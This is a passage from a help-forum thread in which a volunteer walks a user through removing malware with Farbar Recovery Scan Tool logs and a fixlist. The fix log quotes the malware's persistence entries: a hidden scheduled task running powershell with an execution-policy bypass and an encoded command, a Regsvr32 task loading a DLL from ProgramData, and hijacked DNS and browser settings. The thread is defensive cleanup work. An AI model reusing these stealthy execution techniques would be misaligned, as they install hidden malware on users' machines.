FirewallRules: [{ACF9C70A-5272-46F3-93D8-D2D49D213FED}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{CA33086F-BDC3-428D-8D10-DE62ACB8AAA3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{36ACC493-0E23-458D-820C-622BFA4B93FC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{9D1CD48C-CFD5-4CA7-87A6-81617FA306A1}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{F92A1FCA-5C1D-48CF-98BF-EDA2F17008C9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{1C1B1AF8-55D4-4A71-9C87-65CDF73A4104}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{E4FB3101-6401-43EF-B9E5-FA030B8C1DDE}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{F4C32483-9A2D-47BC-B7B3-194D184C2AF5}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{D2F77D01-CEBC-4BE4-8FE6-1834E4CEFFC5}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{A99C007B-88AF-46E8-84B8-8EB840704F55}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{C4F08B07-3F8B-4D25-AE37-B1BE5045F749}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{75F70689-0AC1-4538-966D-B2034F5745AA}] => (Allow) C:\Users\Christina\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{540B4AC0-AEDF-47CF-A82B-21E69AE8E419}] => (Allow) C:\Users\Christina\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{81B34784-524E-400D-B73C-E29D03DEF79D}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{CDF4C2CE-4EC5-4A40-BDAD-FF738F912AC4}] => (Allow) C:\Users\Christina\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{42AB3E35-2CED-422F-AB69-C5009BFD6328}] => (Allow) C:\Users\Christina\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{E73B325A-BF6D-455F-ACA1-E64809DD99A4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{74566550-4DDA-40A9-8FF7-AC4C54FD0489}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{9EF6A1F9-9326-4970-B163-2BBD4473FB75}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ECB6D39D-A812-446D-AA10-C73C27F13C3A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C474BE77-F466-4BA6-A9F6-C7B5AD3EF08A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{BE709685-355F-4018-89C6-5F850030BBD4}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{D61AFFF8-036D-481E-9B91-EE03D582580F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{48C44763-CD80-46BA-B826-92A194DEF5E1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

07-03-2016 21:38:07 Windows Update
21-04-2016 20:54:16 Windows Update
01-05-2016 02:12:38 Windows Update

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (05/01/2016 05:59:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 45.0.2.5941, time stamp: 0x57071d64
Faulting module name: mozglue.dll, version: 45.0.2.5941, time stamp: 0x57070ebc
Exception code: 0x80000003
Fault offset: 0x0000ec22
Faulting process id: 0x2a28
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3
Faulting package full name: plugin-container.exe4
Faulting package-relative application ID: plugin-container.exe5

Error: (05/01/2016 03:45:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: adwcleaner_5.114.exe, version: 5.1.1.4, time stamp: 0x57227299
Faulting module name: adwcleaner_5.114.exe, version: 5.1.1.4, time stamp: 0x57227299
Exception code: 0xc0000005
Fault offset: 0x00020fea
Faulting process id: 0x2368
Faulting application start time: 0xadwcleaner_5.114.exe0
Faulting application path: adwcleaner_5.114.exe1
Faulting module path: adwcleaner_5.114.exe2
Report Id: adwcleaner_5.114.exe3
Faulting package full name: adwcleaner_5.114.exe4
Faulting package-relative application ID: adwcleaner_5.114.exe5

Error: (05/01/2016 03:27:24 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073415161

Error: (05/01/2016 03:22:46 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest2" on line C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.
Component 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.

Error: (05/01/2016 03:05:44 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest2" on line C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.
Component 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.

Error: (05/01/2016 01:47:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_PcaSvc, version: 6.3.9600.16384, time stamp: 0x5215dfe3
Faulting module name: ntdll.dll, version: 6.3.9600.18194, time stamp: 0x56951674
Exception code: 0xc0000008
Fault offset: 0x00000000000925fa
Faulting process id: 0x334
Faulting application start time: 0xsvchost.exe_PcaSvc0
Faulting application path: svchost.exe_PcaSvc1
Faulting module path: svchost.exe_PcaSvc2
Report Id: svchost.exe_PcaSvc3
Faulting package full name: svchost.exe_PcaSvc4
Faulting package-relative application ID: svchost.exe_PcaSvc5

Error: (05/01/2016 01:43:57 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073415161

Error: (04/26/2016 04:53:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 45.0.2.5941 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1714

Start Time: 01d19ffd85fcb8e5

Termination Time: 4294967295

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: f57555f4-0bf0-11e6-8272-f816544bfe14

Faulting package full name:

Faulting package-relative application ID:

Error: (04/26/2016 04:53:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 45.0.2.5941, time stamp: 0x57071d64
Faulting module name: mozglue.dll, version: 45.0.2.5941, time stamp: 0x57070ebc
Exception code: 0x80000003
Fault offset: 0x0000ec22
Faulting process id: 0x3cc
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3
Faulting package full name: plugin-container.exe4
Faulting package-relative application ID: plugin-container.exe5

Error: (04/22/2016 03:51:22 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15125

System errors:
=============
Error: (05/01/2016 06:14:46 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The McAfee Home Network service hung on starting.

Error: (05/01/2016 06:10:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Service Installer TrueKey service failed to start due to the following error:
%%2

Error: (05/01/2016 06:09:12 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (05/01/2016 06:09:12 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (05/01/2016 06:07:04 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\Windows\System32\IWMSSvc.dll

Error: (05/01/2016 06:07:04 AM) (Source: DCOM) (EventID: 10010) (User: PERSONAL)
Description: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

Error: (05/01/2016 06:05:00 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (05/01/2016 06:04:30 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Software Framework Service service terminated unexpectedly. It has done this 2 time(s).

Error: (05/01/2016 06:04:30 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly. It has done this 2 time(s).

Error: (05/01/2016 06:04:30 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) PROSet/Wireless Registry Service service terminated unexpectedly. It has done this 2 time(s).

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4510U CPU @ 2.00GHz
Percentage of memory in use: 40%
Total physical RAM: 8122.15 MB
Available physical RAM: 4852.32 MB
Total Virtual: 9850.15 MB
Available Virtual: 6374.14 MB
 
#17 ·
Now go back and do it properly
You have missed out part of the logs, including all the vital system information at the top of the logs
please attach the logs to your reply instead of trying to paste them in over multiple posts

Don't waste your money on Spyhunter or any other paid for program you find on web search
Uninstall spyhunter
If you want help here, then follow instructions exactly. Do not download or run any programs, except the ones we tell you to.
 
#19 ·
next step
Download attached fixlist.txt file and save it to your downloads folder .

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Attachments

#20 ·
Here is the Fix Log:

Fix result of Farbar Recovery Scan Tool (x64) Version:30-04-2016
Ran by xains_000 (2016-05-01 07:32:16) Run:1
Running from C:\Users\xains_000\Downloads
Loaded Profiles: xains_000 (Available Profiles: Christina & xains_000)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3331220&octid=EB_ORIGINAL_CTID&ISID=M6EF061FB-6526-469B-B6FA-79788B78C26B&SearchSource=55&CUI=&UM=6&UP=SP99B2B66A-35FF-47D4-A2C1-379849B5BFA5&SSPV=","hxxps://www.google.com/","hxxp://searchy.easylifeapp.com/"
Task: {3BCB0E27-349B-4CB0-B83B-F99E97443699} - System32\Tasks\{7F7A0B47-057D-790F-0B11-7E0B0B0A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9452 more characters). <==== ATTENTION
Task: {82EECDA3-D848-4507-88F5-BAC4056077E3} - System32\Tasks\{3812E89A-9CD5-827D-95E1-138FFC80BA45} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\519cee09\67178cbb.dll" <==== ATTENTION
C:\PROGRA~3\519cee09
emptytemp:

*****************

HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully
Chrome StartupUrls => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3BCB0E27-349B-4CB0-B83B-F99E97443699}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BCB0E27-349B-4CB0-B83B-F99E97443699}" => key removed successfully
C:\Windows\System32\Tasks\{7F7A0B47-057D-790F-0B11-7E0B0B0A117D} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F7A0B47-057D-790F-0B11-7E0B0B0A117D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82EECDA3-D848-4507-88F5-BAC4056077E3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82EECDA3-D848-4507-88F5-BAC4056077E3}" => key removed successfully
C:\Windows\System32\Tasks\{3812E89A-9CD5-827D-95E1-138FFC80BA45} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3812E89A-9CD5-827D-95E1-138FFC80BA45}" => key removed successfully
"C:\PROGRA~3\519cee09" => not found.
EmptyTemp: => 1.2 GB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 07:36:30 ====
 
#23 ·
If everything Is ok now
delete the FRST files and txts from downloads folder
Delete C:\frst ( folder)
go here http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/ for info on how to tighten your security settings and how to help prevent future attacks.

and scan here http://secunia.com/vulnerability_scanning/personal for out of date & vulnerable common applications on your computer and update whatever it suggests.

Then pay an urgent visit to windows update & make sure you are fully updated, that will help to plug the security holes that let these pests on in the first place. If windows update doesn't work, please come back & tell us
 
Status
Not open for further replies.
You have insufficient privileges to reply here.
Top